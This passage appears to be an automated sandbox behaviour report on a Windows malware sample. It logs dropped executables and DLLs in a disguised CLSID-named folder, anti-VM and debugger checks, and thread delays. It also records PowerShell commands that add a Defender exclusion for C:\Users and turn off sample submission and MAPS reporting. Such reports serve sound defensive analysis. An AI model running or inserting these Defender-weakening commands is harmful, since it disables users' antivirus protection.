Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetLastError,EnumServicesStatusExA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strcpy,23_2_00007FFE11BD7694
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,23_2_00007FFE11506078
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,23_2_00007FFE11BDB648
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,23_2_00007FFE11EC2738
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,23_2_00007FFE126E3058
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,23_2_00007FFE1A4F4928
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,23_2_00007FFE1A521D98
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,32_2_00007FFE11776078
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4822Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5045Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6319Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3372Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7904Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1638Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\ROF9A37wJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\TsG1eHItJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\bMZx4vGrJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\ogg99SMuJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\t291wOioJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\Cw0MZxefJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\eKTTDy2kJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\6rRRlGVVJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\w3LkirgHJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_23-60660
Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_5-11418
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeAPI coverage: 8.0 %
Source: C:\Users\user\Desktop\file.exe TID: 7160Thread sleep time: -35760000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5744Thread sleep count: 4822 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4428Thread sleep count: 5045 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2476Thread sleep time: -5534023222112862s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5356Thread sleep count: 6319 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4948Thread sleep count: 3372 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6544Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1620Thread sleep count: 7904 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2844Thread sleep count: 1638 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6248Thread sleep time: -5534023222112862s >= -30000sJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 7116Thread sleep count: 46 > 30
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Users\user\Desktop\file.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exeCode function: 5_2_00007FF64B933DB3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,5_2_00007FF64B933DB3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FF7C1AB47A3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,23_2_00007FF7C1AB47A3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE1150A083 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,23_2_00007FFE1150A083
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11BD1883 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,23_2_00007FFE11BD1883
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11EC5BF3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,23_2_00007FFE11EC5BF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE126E57B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,23_2_00007FFE126E57B3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE1A4F5203 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,23_2_00007FFE1A4F5203
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE1A522FE3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,23_2_00007FFE1A522FE3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE1177A083 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FFE1177A083
Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: Amcache.hve.31.drBinary or memory string: VMware
Source: Amcache.hve.31.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.31.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.31.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.31.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.31.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.31.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.31.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.31.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.31.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.31.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.31.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2334937494.000002B8FC2D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2277765517.00000157C4DCC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2954686645.00000142D8248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: file.exe, 00000001.00000002.2953885741.0000000000B49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllGG
Source: Amcache.hve.31.drBinary or memory string: vmci.sys
Source: main.exe, 00000017.00000002.2667296151.00000157C4DAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9
Source: Amcache.hve.31.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.31.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.31.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.31.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.31.drBinary or memory string: VMware20,1
Source: Amcache.hve.31.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.31.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.31.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.31.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.31.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.31.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.31.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.31.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.31.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.31.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.31.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeAPI call chain: ExitProcess graph end nodegraph_23-58245
Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeProcess queried: DebugPort
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeProcess queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exeCode function: 5_2_00007FF64B93FF1F GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,5_2_00007FF64B93FF1F
Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exeCode function: 5_2_00007FF64B938CFC FreeLibrary,strlen,GetProcessHeap,HeapAlloc,BuildTrusteeWithSidW,BuildSecurityDescriptorW,GetProcessHeap,HeapFree,LocalFree,5_2_00007FF64B938CFC
Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exeCode function: 5_2_00007FF64B931131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,5_2_00007FF64B931131
Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exeCode function: 5_2_00007FF64B94B6A0 SetUnhandledExceptionFilter,5_2_00007FF64B94B6A0
Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exeCode function: 5_2_00007FF64B9405D9 SetUnhandledExceptionFilter,5_2_00007FF64B9405D9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FF7C1AB1131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,23_2_00007FF7C1AB1131

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exeCode function: 5_2_00007FF64B93292E strlen,strcat,strlen,strlen,strlen,strcat,strlen,strlen,strlen,strcat,LogonUserA,GetLastError,CreateProcessAsUserA,GetLastError,CloseHandle,CreateProcessA,GetLastError,5_2_00007FF64B93292E
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"Jump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 2656 -ip 2656
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2656 -s 1188
